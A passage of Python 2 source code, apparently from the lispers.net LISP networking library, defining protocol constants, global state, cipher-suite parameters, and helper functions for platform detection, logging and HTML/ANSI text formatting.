import platform
import Queue
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import commands
import copy
import chacha
import poly1305
from geopy.distance import vincenty
import curve25519
use_chacha = (os.getenv("LISP_USE_CHACHA") != None)
use_poly = (os.getenv("LISP_USE_POLY") != None)
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. First dictionary array is indexed by device name
# and second one has value lisp_interface() indexed by an instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time creates the g, p, and public-key values. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, that we write specific information
# to say a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. Key is
# hostname that is sent in a Info-Request is a nested array. See
# lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests.
#
lisp_last_map_request_sent = None
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long of an ICMP echo-request and
# echo-reply for testing purposes. To show per packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcapture IPv4 fragments. They can come to the ETR
# when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is index by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# a EID target it is requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends is
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
# also running as a Map-Server and Map-Resolver. So Map-Register messages the
# ETR sends is looped back to the lisp-ms process.
#
lisp_decent_modulus = 0
lisp_decent_dns_suffix = None
#
# lisp.lisp_ipc_socket is used by the lisp-itr process during RLOC-probing
# to send the lisp-etr process status about RTRs learned. This is part of
# NAT-traversal support.
#
lisp_ipc_socket = None
#
# Configured in the "lisp encryption-keys" command.
#
lisp_ms_encryption_keys = {}
#
# Used to store NAT translated address state in an RTR when a ltr client
# is sending RLOC-based LISP-Trace messages. If the RTR encounters any
# LISP-Trace error processing called from lisp_rtr_data_plane() then it
# can return a partially filled LISP-Trace packet to the ltr client that
# sits behind a NAT device.
#
# Dictionary array format is:
# key = self.local_addr + ":" + self.local_port
# lisp_rtr_nat_trace_cache[key] = (translated_rloc, translated_port)
#
# And the array elements are added in lisp_trace.rtr_cache_nat_trace().
#
lisp_rtr_nat_trace_cache = {}
#
# Configured glean mappings. The data structure is an array of dictionary
# arrays with keywords "eid-prefix", "group-prefix", "rloc-prefix", and
# "instance-id". If keywords are not in dictionary array, the value is
# wildcarded. The values eid-prefix, group-prefix and rloc-prefix is
# lisp_address() so longest match lookups can be performed. The instance-id
# value is an array of 2 elements that store same value in both elements if
# not a range or the low and high range values.
#
lisp_glean_mappings = []
#
# Gleaned groups data structure. Used to find all (S,G) and (*,G) the gleaned
# EID has joined. This data structure will be used to time out entries that
# have stopped joining. In which case, the RLE is removed from the (S,G) or
# (*,G) that join timed out.
#
# The dictionary array is indexed by "[<iid>]<eid>" and the value field is a
# dictionary array indexed by group address string. The value of the nested
# dictionary array is a timestamp. When EID 1.1.1.1 has joined groups 224.1.1.1,
# and 224.2.2.2, here is how timestamp 1111 and 2222 are stored.
#
# >>> lisp_gleaned_groups = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"] = {}
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.1.1.1"] = 1111
# >>> lisp_gleaned_groups["[1539]1.1.1.1"]["224.2.2.2"] = 2222
# >>> lisp_gleaned_groups
# {'[1539]1.1.1.1': {'224.2.2.2': 2222, '224.1.1.1': 1111}}
#
lisp_gleaned_groups = {}
#
# Use this socket for all ICMP Too-Big messages sent by any process. We are
# centralizing it here.
#
lisp_icmp_raw_socket = None
if (os.getenv("LISP_SEND_ICMP_TOO_BIG") != None):
lisp_icmp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_ICMP)
lisp_icmp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
#endif
lisp_ignore_df_bit = (os.getenv("LISP_IGNORE_DF_BIT") != None)
#------------------------------------------------------------------------------
#
# UDP ports used by LISP.
#
LISP_DATA_PORT = 4341
LISP_CTRL_PORT = 4342
LISP_L2_DATA_PORT = 8472
LISP_VXLAN_DATA_PORT = 4789
LISP_VXLAN_GPE_PORT = 4790
LISP_TRACE_PORT = 2434
#
# Packet type definitions.
#
LISP_MAP_REQUEST = 1
LISP_MAP_REPLY = 2
LISP_MAP_REGISTER = 3
LISP_MAP_NOTIFY = 4
LISP_MAP_NOTIFY_ACK = 5
LISP_MAP_REFERRAL = 6
LISP_NAT_INFO = 7
LISP_ECM = 8
LISP_TRACE = 9
#
# Map-Reply action values.
#
LISP_NO_ACTION = 0
LISP_NATIVE_FORWARD_ACTION = 1
LISP_SEND_MAP_REQUEST_ACTION = 2
LISP_DROP_ACTION = 3
LISP_POLICY_DENIED_ACTION = 4
LISP_AUTH_FAILURE_ACTION = 5
lisp_map_reply_action_string = ["no-action", "native-forward",
"send-map-request", "drop-action", "policy-denied", "auth-failure" ]
#
# Various HMACs alg-ids and lengths (in bytes) used by LISP.
#
LISP_NONE_ALG_ID = 0
LISP_SHA_1_96_ALG_ID = 1
LISP_SHA_256_128_ALG_ID = 2
LISP_MD5_AUTH_DATA_LEN = 16
LISP_SHA1_160_AUTH_DATA_LEN = 20
LISP_SHA2_256_AUTH_DATA_LEN = 32
#
# LCAF types as defined in draft-ietf-lisp-lcaf.
#
LISP_LCAF_NULL_TYPE = 0
LISP_LCAF_AFI_LIST_TYPE = 1
LISP_LCAF_INSTANCE_ID_TYPE = 2
LISP_LCAF_ASN_TYPE = 3
LISP_LCAF_APP_DATA_TYPE = 4
LISP_LCAF_GEO_COORD_TYPE = 5
LISP_LCAF_OPAQUE_TYPE = 6
LISP_LCAF_NAT_TYPE = 7
LISP_LCAF_NONCE_LOC_TYPE = 8
LISP_LCAF_MCAST_INFO_TYPE = 9
LISP_LCAF_ELP_TYPE = 10
LISP_LCAF_SECURITY_TYPE = 11
LISP_LCAF_SOURCE_DEST_TYPE = 12
LISP_LCAF_RLE_TYPE = 13
LISP_LCAF_JSON_TYPE = 14
LISP_LCAF_KV_TYPE = 15
LISP_LCAF_ENCAP_TYPE = 16
#
# TTL constant definitions.
#
LISP_MR_TTL = (24*60)
LISP_REGISTER_TTL = 3
LISP_SHORT_TTL = 1
LISP_NMR_TTL = 15
LISP_GLEAN_TTL = 15
LISP_IGMP_TTL = 240
LISP_SITE_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_PUBSUB_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_REFERRAL_TIMEOUT_CHECK_INTERVAL = 60 # In units of seconds
LISP_TEST_MR_INTERVAL = 60 # In units of seconds
LISP_MAP_NOTIFY_INTERVAL = 2 # In units of seconds
LISP_DDT_MAP_REQUEST_INTERVAL = 2 # In units of seconds
LISP_MAX_MAP_NOTIFY_RETRIES = 3
LISP_INFO_INTERVAL = 15 # In units of seconds
LISP_MAP_REQUEST_RATE_LIMIT = 5 # In units of seconds
LISP_ICMP_TOO_BIG_RATE_LIMIT = 1 # In units of seconds
#LISP_RLOC_PROBE_TTL = 255
LISP_RLOC_PROBE_TTL = 64
LISP_RLOC_PROBE_INTERVAL = 10 # In units of seconds
LISP_RLOC_PROBE_REPLY_WAIT = 15 # In units of seconds
#LISP_RLOC_PROBE_INTERVAL = 60 # In units of seconds
LISP_DEFAULT_DYN_EID_TIMEOUT = 15 # In units of seconds
LISP_NONCE_ECHO_INTERVAL = 10
LISP_IGMP_TIMEOUT_INTERVAL = 180 # 3 minutes
#
# Cipher Suites defined in RFC 8061:
#
# Cipher Suite 0:
# Reserved
#
# Cipher Suite 1 (LISP_2048MODP_AES128_CBC_SHA256):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 2 (LISP_EC25519_AES128_CBC_SHA256):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in CBC mode [AES-CBC]
# Integrity: Integrated with AEAD_AES_128_CBC_HMAC_SHA_256 [AES-CBC]
# IV length: 16 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 3 (LISP_2048MODP_AES128_GCM):
# Diffie-Hellman Group: 2048-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 4 (LISP_3072MODP_AES128_GCM):
# Diffie-Hellman Group: 3072-bit MODP [RFC3526]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 5 (LISP_256_EC25519_AES128_GCM):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: AES with 128-bit keys in GCM mode [RFC5116]
# Integrity: Integrated with AEAD_AES_128_GCM [RFC5116]
# IV length: 12 bytes
# KDF: HMAC-SHA-256
#
# Cipher Suite 6 (LISP_256_EC25519_CHACHA20_POLY1305):
# Diffie-Hellman Group: 256-bit Elliptic-Curve 25519 [CURVE25519]
# Encryption: Chacha20-Poly1305 [CHACHA-POLY] [RFC7539]
# Integrity: Integrated with AEAD_CHACHA20_POLY1305 [CHACHA-POLY]
# IV length: 8 bytes
# KDF: HMAC-SHA-256
#
LISP_CS_1024 = 0
LISP_CS_1024_G = 2
LISP_CS_1024_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_2048_CBC = 1
LISP_CS_2048_CBC_G = 2
LISP_CS_2048_CBC_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE65381FFFFFFFFFFFFFFFF
LISP_CS_25519_CBC = 2
LISP_CS_2048_GCM = 3
LISP_CS_3072 = 4
LISP_CS_3072_G = 2
LISP_CS_3072_P = 0xFFFFFFFFFFFFFFFFC90FDAA22168C234C4C6628B80DC1CD129024E088A67CC74020BBEA63B139B22514A08798E3404DDEF9519B3CD3A431B302B0A6DF25F14374FE1356D6D51C245E485B576625E7EC6F44C42E9A637ED6B0BFF5CB6F406B7EDEE386BFB5A899FA5AE9F24117C4B1FE649286651ECE45B3DC2007CB8A163BF0598DA48361C55D39A69163FA8FD24CF5F83655D23DCA3AD961C62F356208552BB9ED529077096966D670C354E4ABC9804F1746C08CA18217C32905E462E36CE3BE39E772C180E86039B2783A2EC07A28FB5C55DF06F4C52C9DE2BCBF6955817183995497CEA956AE515D2261898FA051015728E5A8AAAC42DAD33170D04507A33A85521ABDF1CBA64ECFB850458DBEF0A8AEA71575D060C7DB3970F85A6E1E4C7ABF5AE8CDB0933D71E8C94E04A25619DCEE3D2261AD2EE6BF12FFA06D98A0864D87602733EC86A64521F2B18177B200CBBE117577A615D6C770988C0BAD946E208E24FA074E5AB3143DB5BFCE0FD108E4B82D120A93AD2CAFFFFFFFFFFFFFFFF
LISP_CS_25519_GCM = 5
LISP_CS_25519_CHACHA = 6
LISP_4_32_MASK = 0xFFFFFFFF
LISP_8_64_MASK = 0xFFFFFFFFFFFFFFFF
LISP_16_128_MASK = 0xFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
#------------------------------------------------------------------------------
#
# lisp_record_traceback
#
# Open ./logs/lisp-traceback.log file and write traceback info to it.
#
def lisp_record_traceback(*args):
    """Append the most recent traceback to ./logs/lisp-traceback.log.

    Installed as sys.excepthook by lisp_set_exception(), so it receives
    (type, value, traceback) arguments, but they are unused; the
    traceback module's saved "last" exception is what gets written.
    """
    now = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")[:-3]
    log = open("./logs/lisp-traceback.log", "a")
    log.write("---------- Exception occurred: {} ----------\n".format(now))
    try:
        traceback.print_last(file=log)
    except:
        log.write("traceback.print_last(file=fd) failed")
    #endtry
    try:
        traceback.print_last()
    except:
        print("traceback.print_last() failed")
    #endtry
    log.close()
    return
#enddef
#
# lisp_set_exception
#
# Set exception callback to call lisp.lisp_record_traceback().
#
def lisp_set_exception():
    """Route all uncaught exceptions to lisp_record_traceback()."""
    sys.excepthook = lisp_record_traceback
    return
#enddef
#
# lisp_is_raspbian
#
# Return True if this system is running Raspbian on a Raspberry Pi machine.
#
def lisp_is_raspbian():
    # Raspbian identifies itself as a "debian" distro; narrow further to
    # the ARM CPU types used by Raspberry Pi boards.
    # NOTE: platform.dist() is Python-2 only (removed in Python 3.8).
    if (platform.dist()[0] != "debian"): return(False)
    return(platform.machine() in ["armv6l", "armv7l"])
#enddef
#
# lisp_is_ubuntu
#
# Return True if this system is running Ubuntu Linux.
#
def lisp_is_ubuntu():
    # NOTE: platform.dist() is Python-2 only (removed in Python 3.8).
    return(platform.dist()[0] == "Ubuntu")
#enddef
#
# lisp_is_fedora
#
# Return True if this system is running Fedora Linux.
#
def lisp_is_fedora():
    # NOTE: platform.dist() is Python-2 only (removed in Python 3.8).
    return(platform.dist()[0] == "fedora")
#enddef
#
# lisp_is_centos
#
# Return True if this system is running CentOS Linux.
#
def lisp_is_centos():
    # NOTE: platform.dist() is Python-2 only (removed in Python 3.8).
    return(platform.dist()[0] == "centos")
#enddef
#
# lisp_is_debian
#
# Return True if this system is running Debian Jessie.
#
def lisp_is_debian():
    # NOTE: platform.dist() is Python-2 only (removed in Python 3.8).
    return(platform.dist()[0] == "debian")
#enddef
#
# lisp_is_debian_kali
#
# Return True if this system is running Kali Linux.
#
def lisp_is_debian_kali():
    # NOTE: platform.dist() is Python-2 only (removed in Python 3.8).
    return(platform.dist()[0] == "Kali")
#enddef
#
# lisp_is_macos
#
# Return True if this system is running MacOS operating system.
#
def lisp_is_macos():
    """Return True when the underlying OS is Darwin (MacOS)."""
    system_name = platform.uname()[0]
    return(system_name == "Darwin")
#enddef
#
# lisp_is_alpine
#
# Return True if this system is running the Alpine Linux operating system.
#
def lisp_is_alpine():
    """Alpine Linux is detected by the presence of its release file."""
    alpine_release = "/etc/alpine-release"
    return(os.path.exists(alpine_release))
#enddef
#
# lisp_is_x86
#
# Return True if this process is an x86 little-endian machine.
#
def lisp_is_x86():
    """Return True when this process runs on an x86 little-endian CPU."""
    return(platform.machine() in ("x86", "i686", "x86_64"))
#enddef
#
# lisp_is_linux
#
# Return True if this is a ubuntu or fedora system.
#
def lisp_is_linux():
    """Return True when the underlying kernel is Linux."""
    kernel = platform.uname()[0]
    return(kernel == "Linux")
#enddef
#
# lisp_on_aws
#
# Return True if this node is running in an Amazon VM on AWS.
#
def lisp_on_aws():
    # dmidecode reports the BIOS vendor; on EC2 instances the string
    # contains "amazon". Inside a docker container dmidecode may not be
    # installed, in which case we log the fact and fall through (the
    # vendor string then cannot match "amazon").
    vm = commands.getoutput("sudo dmidecode -s bios-version")
    if (vm.find("command not found") != -1 and lisp_on_docker()):
        aws = bold("AWS check", False)
        lprint("{} - dmidecode not installed in docker container".format(aws))
    #endif
    return(vm.lower().find("amazon") != -1)
#enddef
#
# lisp_on_gcp
#
# Return True if this node is running in an Google Compute Engine VM.
#
def lisp_on_gcp():
    """Return True when the BIOS vendor string indicates a GCE VM."""
    bios = commands.getoutput("sudo dmidecode -s bios-version")
    return(bios.lower().find("google") != -1)
#enddef
#
# lisp_on_docker
#
# Are we in a docker container?
#
def lisp_on_docker():
    """Docker containers are detected by the /.dockerenv marker file."""
    dockerenv_marker = "/.dockerenv"
    return(os.path.exists(dockerenv_marker))
#enddef
#
# lisp_process_logfile
#
# Check to see if logfile exists. If not, it is startup time to create one
# or another procedure rotated the file out of the directory.
#
def lisp_process_logfile():
    # Per-component logfile name, e.g. ./logs/lisp-itr.log.
    logfile = "./logs/lisp-{}.log".format(lisp_log_id)
    if (os.path.exists(logfile)): return
    # Logfile is missing (process startup, or an external rotation moved
    # it away). stdout is redirected into the logfile, so close the old
    # stream, reopen a fresh file, and stamp it with a banner.
    sys.stdout.close()
    sys.stdout = open(logfile, "a")
    lisp_print_banner(bold("logfile rotation", False))
    return
#enddef
#
# lisp_i_am
#
# The individual components tell the libraries who they are so we can prefix
# the component name for print() and logs().
#
def lisp_i_am(name):
    """Record which LISP component ("itr", "etr", "rtr", "mr", "ms",
    "ddt", or "core") this process is running as.

    Sets the per-component lisp_i_am_* flag, the logging prefix, and a
    domain-stripped hostname used in banners and log messages.
    """
    global lisp_log_id, lisp_i_am_itr, lisp_i_am_etr, lisp_i_am_rtr
    global lisp_i_am_mr, lisp_i_am_ms, lisp_i_am_ddt, lisp_i_am_core
    global lisp_hostname
    lisp_log_id = name
    if (name == "core"): lisp_i_am_core = True
    if (name == "itr"): lisp_i_am_itr = True
    if (name == "etr"): lisp_i_am_etr = True
    if (name == "rtr"): lisp_i_am_rtr = True
    if (name == "mr"): lisp_i_am_mr = True
    if (name == "ms"): lisp_i_am_ms = True
    if (name == "ddt"): lisp_i_am_ddt = True
    #
    # Normalize "dino-macbook.local" or "dino-macbook.wp.comcast.net"
    # down to just "dino-macbook".
    #
    hn = socket.gethostname()
    dot = hn.find(".")
    if (dot != -1): hn = hn[0:dot]
    lisp_hostname = hn
    return
#enddef
#
# lprint
#
# Print with timestamp and component name prefixed. If "force" is any argument,
# then we don't care about the lisp_debug_logging setting and a log message
# is issued.
#
def lprint(*args):
    # Timestamped log print for the current LISP component. Each argument
    # is printed space-separated after a "<ts>: <component>:" prefix.
    # Logging is suppressed when lisp_debug_logging is False unless one
    # of the arguments is the literal string "force", which is consumed
    # (not printed) and forces the message out regardless.
    force = ("force" in args)
    if (lisp_debug_logging == False and force == False): return
    # Reopen the logfile if it was rotated away from under us.
    lisp_process_logfile()
    # Millisecond-resolution timestamp (strip microseconds to 3 digits).
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]
    print "{}: {}:".format(ts, lisp_log_id),
    for arg in args:
        if (arg == "force"): continue
        print arg,
    #endfor
    print ""
    # stdout is a logfile; flush so tail -f shows messages promptly.
    try: sys.stdout.flush()
    except: pass
    return
#enddef
#
# dprint
#
# Data-plane logging. Call lprint() only if lisp.lisp_data_plane_logging is
# True.
#
def dprint(*args):
    """Data-plane logging: forward to lprint() only when
    lisp_data_plane_logging is enabled."""
    if (not lisp_data_plane_logging): return
    lprint(*args)
    return
#enddef
#
# debug
#
# Used for debugging. Used to find location of temporary "printf" code so it
# can be removed for production code.
#
def debug(*args):
    # Temporary "printf"-style debugging helper. The distinctive red
    # ">>>"/"<<<" markers make these call sites easy to find and remove
    # before production.
    lisp_process_logfile()
    # Millisecond-resolution timestamp (strip microseconds to 3 digits).
    ts = datetime.datetime.now().strftime("%m/%d/%y %H:%M:%S.%f")
    ts = ts[:-3]
    print red(">>>", False),
    print "{}:".format(ts),
    for arg in args: print arg,
    print red("<<<\n", False)
    # stdout is a logfile; flush so messages appear promptly.
    try: sys.stdout.flush()
    except: pass
    return
#enddef
#
# lisp_print_banner
#
# Print out startup and shutdown banner.
#
def lisp_print_banner(string):
    """Log a startup/shutdown banner with version, date, and hostname."""
    global lisp_version, lisp_hostname
    # Lazily read the release version the first time a banner is printed.
    if (lisp_version == ""):
        lisp_version = commands.getoutput("cat lisp-version.txt")
    #endif
    hn = bold(lisp_hostname, False)
    lprint("lispers.net LISP {} {}, version {}, hostname {}".format(string,
        datetime.datetime.now(), lisp_version, hn))
    return
#enddef
#
# green
#
# For printing banner.
#
def green(string, html):
    """Render 'string' green: HTML markup when html is True, else ANSI."""
    if (not html):
        return(bold("\033[92m" + string + "\033[0m", html))
    #endif
    return('<font color="green"><b>{}</b></font>'.format(string))
#enddef
#
# green_last_sec
#
# For printing packets in the last 1 second.
#
def green_last_sec(string):
    """HTML-green rendering for packet counts in the last second."""
    html = green(string, True)
    return(html)
#enddef
#
# green_last_minute
#
# For printing packets in the last 1 minute.
#
def green_last_min(string):
    """Light-green HTML rendering for packet counts in the last minute."""
    html = '<font color="#58D68D"><b>{}</b></font>'.format(string)
    return(html)
#enddef
#
# red
#
# For printing banner.
#
def red(string, html):
    """Render 'string' red: HTML markup when html is True, else ANSI."""
    if (not html):
        return(bold("\033[91m" + string + "\033[0m", html))
    #endif
    return('<font color="red"><b>{}</b></font>'.format(string))
#enddef
#
# blue
#
# For printing distinguished-name AFIs.
#
def blue(string, html):
    """Render 'string' blue (used for distinguished-name AFIs): HTML
    markup when html is True, else ANSI."""
    if (not html):
        return(bold("\033[94m" + string + "\033[0m", html))
    #endif
    return('<font color="blue"><b>{}</b></font>'.format(string))
#enddef
#
# bold
#
# For printing banner.
#
def bold(string, html):
    """Render 'string' bold: HTML markup when html is True, else ANSI."""
    if (not html): return("\033[1m" + string + "\033[0m")
    return("<b>{}</b>".format(string))
#enddef
#
# convert_font
#
# Converts from text-based bold/color to HTML bold/color.
#
def convert_font(string):
    """Convert ANSI escape colored/bold text to HTML equivalents.

    Finds the first known ANSI start escape present in 'string', rewraps
    every left...right escaped segment with the matching HTML helper
    (red/green/blue/bold), and recurses once more when a color escape was
    nested inside a bold escape.
    """
    # Map each ANSI start sequence to its HTML-producing helper.
    escapes = [ ["[91m", red], ["[92m", green], ["[94m", blue], ["[1m", bold] ]
    right = "[0m"
    # Locate the first escape type that occurs in the string (if any).
    for e in escapes:
        left = e[0]
        color = e[1]
        offset = len(left)
        index = string.find(left)
        if (index != -1): break
    #endfor
    # Replace each occurrence of that escape pair with HTML markup.
    while (index != -1):
        end = string[index::].find(right)
        bold_string = string[index+offset:index+end]
        string = string[:index] + color(bold_string, True) + \
            string[index+end+offset::]
        index = string.find(left)
    #endwhile
    #
    # Call this function one more time if a color was in bold.
    #
    if (string.find("[1m") != -1): string = convert_font(string)
    return(string)
#enddef
#
# lisp_space
#
# Put whitespace in URL encoded string.
#
def lisp_space(num):
    """Return 'num' HTML non-breaking spaces ("&#160;").

    Used to pad URL/HTML encoded output. Replaces the character-at-a-time
    accumulation loop with direct string repetition.
    """
    return("&#160;" * num)
#enddef
#
# lisp_button
#
# Return string of a LISP html button.
#
def lisp_button(string, url):
    """Return HTML for a LISP dashboard button, hyperlinked when a url
    is supplied."""
    button = '<button style="background-color:transparent;border-radius:10px; ' + \
        'type="button">'
    if (url == None):
        return(button + string + "</button>")
    #endif
    pad = lisp_space(2)
    anchor = '<a href="{}">'.format(url)
    return(pad + anchor + button + string + "</button></a>" + pad)
#enddef
#
# lisp_print_cour
#
# Print in HTML Courier-New font.
#
def lisp_print_cour(string):
    """Wrap 'string' in an HTML Courier New font tag."""
    return('<font face="Courier New">{}</font>'.format(string))
#enddef
#
# lisp_print_sans
#
# Print in HTML Sans-Serif font.
#
def lisp_print_sans(string):
    """Wrap 'string' in an HTML Sans-Serif font tag."""
    return('<font face="Sans-Serif">{}</font>'.format(string))
#enddef
#
# lisp_span
#
# Print out string when a pointer hovers over some text.
#
def lisp_span(string, hover_string):
    """Return an HTML span showing 'hover_string' as a tooltip when the
    pointer hovers over 'string'."""
    return('<span title="{}">{}</span>'.format(hover_string, string))
#enddef
#
# lisp_eid_help_hover
#
# Create hover title for any input EID form.
#
def lisp_eid_help_hover(output):
    # Tooltip help text shown when hovering over an EID input form field.
    eid_help_str = \
'''Unicast EID format:
  For longest match lookups:
    <address> or [<iid>]<address>
  For exact match lookups:
    <prefix> or [<iid>]<prefix>
Multicast EID format:
  For longest match lookups:
    <address>-><group> or
    [<iid>]<address>->[<iid>]<group>'''
    hover = lisp_span(output, eid_help_str)
    return(hover)
#enddef
#
# lisp_geo_help_hover
#
# Create hover title for any input Geo or EID form.
#
def lisp_geo_help_hover(output):
    # Tooltip help text shown when hovering over a Geo or EID input form.
    eid_help_str = \
'''EID format:
  <address> or [<iid>]<address>
  '<name>' or [<iid>]'<name>'
Geo-Point format:
  d-m-s-<N|S>-d-m-s-<W|E> or
  [<iid>]d-m-s-<N|S>-d-m-s-<W|E>
Geo-Prefix format:
  d-m-s-<N|S>-d-m-s-<W|E>/<km> or
  [<iid>]d-m-s-<N|S>-d-m-s-<W|E>/<km>'''
    hover = lisp_span(output, eid_help_str)
    return(hover)
#enddef
#
# space
#
# Put whitespace in URL encoded string.
#
def space(num):
    """Return 'num' HTML non-breaking spaces ("&#160;").

    Same contract as lisp_space(); replaces the character-at-a-time
    accumulation loop with direct string repetition.
    """
    return("&#160;" * num)
#enddef
#
# lisp_get_ephemeral_port
#
# Select random UDP port for use of a source port in a Map-Request and
# destination port in a Map-Reply.
#
def lisp_get_ephemeral_port():
    """Pick a random UDP port in the ephemeral range [32768, 65535)."""
    low, high = 32768, 65535
    return(random.randrange(low, high))
#enddef
#
# lisp_get_data_nonce
#
# Get a 24-bit random nonce to insert in data header.
#
